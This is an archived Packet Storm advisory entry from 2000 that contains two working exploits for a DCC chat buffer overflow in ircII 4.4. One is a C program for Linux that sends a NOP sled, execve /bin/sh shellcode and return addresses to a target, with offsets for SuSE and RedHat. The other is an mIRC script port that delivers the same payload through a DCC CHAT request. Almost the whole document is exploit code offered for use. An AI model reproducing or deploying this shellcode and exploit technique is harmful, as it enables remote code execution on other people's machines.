ircii_exploit.txt

2000-04-20T00:00:00
ID PACKETSTORM:10047
Type packetstorm
Reporter Bladi
Modified 2000-04-20T00:00:00

Description

                                        
                                            `The following exploits are for IrcII4.4. A dcc chat buffer overflow, one is for  
linux and the other one is for mirc.  
  
  
-- start irciisploit.txt --  
  
/*  
  
ircii-4.4 exploit by bladi & aLmUDeNa  
  
buffer overflow in ircii dcc chat's  
allow to excute arbitrary  
  
Affected:  
ircII-4.4  
  
Patch:  
Upgrade to ircII-4.4M  
ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz  
  
Offset:  
SuSe 6.x :0xbfffe3ff  
RedHat :0xbfffe888  
  
Thanks to : #warinhell,#hacker_novatos  
Special thanks go to: Topo[lb],  
Saludos para todos los que nos conozcan especialmente para eva ;)  
(bladi@euskalnet.net)  
*/  
  
#include <stdio.h>  
#include <netdb.h>  
#include <string.h>  
#include <signal.h>  
#include <unistd.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netinet/in.h>  
  
char *h_to_ip(char *hostname);  
char *h_to_ip(char *hostname) {  
struct hostent *hozt;  
struct sockaddr_in tmp;  
struct in_addr in;  
if ((hozt=gethostbyname(hostname))==NULL)  
{  
printf(" ERROR: IP incorrecta\n");  
exit(0);  
}  
memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);  
memcpy(&in,&tmp.sin_addr.s_addr,4);  
return(inet_ntoa(in));  
}  
main(int argc, char *argv[])  
{  
struct sockaddr_in sin;  
char *hostname;  
char nops[] =  
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";  
char *shell =  
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"  
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"  
"\x80\xe8\xdc\xff\xff\xff/bin/sh";  
int outsocket,tnt,i;  
printf (" irciismash ver: 1.0\n");  
printf (" by \n");  
printf (" bladi & aLmUDeNa\n\n");  
  
if (argc<3)  
{  
printf("Usage : %s hostname port\n",argv[0]);  
exit(-1);  
}  
hostname=argv[1];  
outsocket=socket(AF_INET,SOCK_STREAM,0);  
sin.sin_family=AF_INET;  
sin.sin_port=htons(atoi(argv[2]));  
sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));  
if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {  
printf(" ERROR: El puerto esta cerradito :_(\n");  
exit(0);  
}  
printf("[1]- Noping\n [");  
for(i=0;i<47;i++)  
{  
if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }  
write(outsocket,nops,strlen(nops));  
}  
printf("]\n");  
printf(" Noped\n");  
printf("[2]- Injectin shellcode\n");  
write(outsocket,shell,strlen(shell));  
usleep(999);  
printf(" Injected\n");  
printf("[3]- Waiting\n [");  
for(i=0;i<299;i++)  
{  
printf(".");  
fflush(stdout);  
usleep(99);  
write(outsocket,"\xff",strlen("\xff"));  
write(outsocket,"\xbf",strlen("\xff"));  
write(outsocket,"\xff",strlen("\xe9"));  
write(outsocket,"\xe3",strlen("\xff"));  
}  
printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");  
close(outsocket);  
}  
  
-- end irciisploit.txt --  
-- start ide_expl.mrc --  
  
# Wrote directly from irciisploit.txt(a .c program for *nix), that someone gave me to port to mirc.  
#  
# Exploit to overflow a buffer and run a shell. Although, more often than not it will crash/seg fault  
# with both versions of this exploit, by default. (exploit noted as being for V4.4, and patched in  
# V4.4M)  
#  
# irciisploit.txt by: bladi & aLmUDeNa  
# irciisploit.mrc(this) by: _v9(vade79)  
#  
# Also included in the exploit(irciisploit.txt) were some other offsets:  
#  
# "SuSe 6.x :0xbfffe3ff"  
# "RedHat :0xbfffe888"  
#  
# To load this script into mIRC5.7: /load -rs <path/to/file.mrc>  
#  
# NOTE: While making this i noticed /sockwrite had some problems catching up on checking to see if  
# the connection still exists, so if you see a /sockwrite error in the status window, the user  
# probably seg faulted.  
  
alias -l bin {  
if ($len($1) != 2) { return }  
var %i, %j, %k  
if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) }  
else { %i = $left($1,1) }  
if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) }  
else { %j = $right($1,1) }  
while (%i) { %k = %k + 16 | dec %i }  
return $calc(%k + %j)  
}  
alias -l make_string {  
var %i = 1, %j  
while ($gettok($replace($1,\x,\),0,92) >= %i) {  
%j = %j $bin($gettok($replace($1,\x,\),%i,92))  
inc %i  
}  
return %j  
}  
alias -l wn return @ircii4.4_dcc_exploit  
alias -l sw {  
if ($2) {  
if ($sock(exp_ide).status != active) {   
if ($window($wn)) { window -c $wn }  
echo -a Connection lost/non-existant. ( $+ %ide.status $+ )  
}  
else {  
if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) }  
sockwrite $1-  
}  
}  
}  
alias -l main {  
if ($window($wn)) { window -c $wn } | window -aek $wn  
echo $wn *** [01]: sending DCC chat request, waiting...  
set %ide.nick $1 | set %ide.port $rand(1024,4096)  
while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) }  
sockclose exp_ide_base | socklisten exp_ide_base %ide.port  
.quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1)  
}  
alias exploit_ircii {  
if ($server) {  
if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt }  
elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt }  
elseif ($1) { main $1 }  
else { echo -a Syntax: /exploit_ircii <nick> }  
}  
}  
on 1:SOCKREAD:exp_ide: {  
if ($sockerr > 0) return  
:read  
sockread %data  
if ($sockbr == 0) return  
if (%data == $null) var %data = (no data)  
if ($window($wn)) { echo $wn -> %data }  
goto read  
}  
on 1:SOCKLISTEN:exp_ide_base: {   
sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base  
unset %ide.status  
if ($window($wn)) {  
set %ide.status 0  
echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc)  
bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90)  
bset &o 1 $make_string(\xff\xbf\xff\xe3)  
bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff)  
bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh  
echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc)  
inc %ide.status  
echo $wn *** [--]: * (1/4) sending the nops, looping 47 times.  
var %i = 0  
while (%i < 47) {   
sw exp_ide &nops  
inc %i   
}  
inc %ide.status  
echo $wn *** [--]: * (2/4) sent, now sending the shell code.  
sw exp_ide &shellcode   
%i = 0 | while (%i < 9999) { inc %i }  
inc %ide.status  
echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times.  
%i = 0  
while (%i < 299) {  
var %j = 0 | while (%j < 499) { inc %j }  
var %j = 1  
while ($bvar(&o,%j)) {   
bset &bit 1 $bvar(&o,%j)  
sw exp_ide &bit  
inc %j  
}  
inc %i  
}  
inc %ide.status  
echo $wn *** [--]: * (4/4) sent, done.  
}  
else { sockclose exp_ide }  
}  
on 1:SOCKCLOSE:exp_ide: {  
if ($window($wn)) { window -c $wn }  
echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ )  
unset %ide.*  
}  
on 1:CLOSE:@: {   
if ($target == $wn) {  
if ($sock(exp_ide)) { sockclose exp_ide }  
if ($sock(exp_ide_base)) { sockclose exp_ide_base }  
unset %ide.*  
}  
}  
on 1:INPUT:@: {  
if ($active == $wn) {  
if ($sock(exp_ide).status == active) {  
if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. }  
else { echo $wn <- $1- | sw -n exp_ide $1- }  
}  
else { echo $wn *** Error, socket status isn't online yet. }  
halt  
}  
}  
on 1:LOAD: {  
if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt }  
else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii <nick>. }  
}  
  
-- end ide_expl.mrc --  
  
`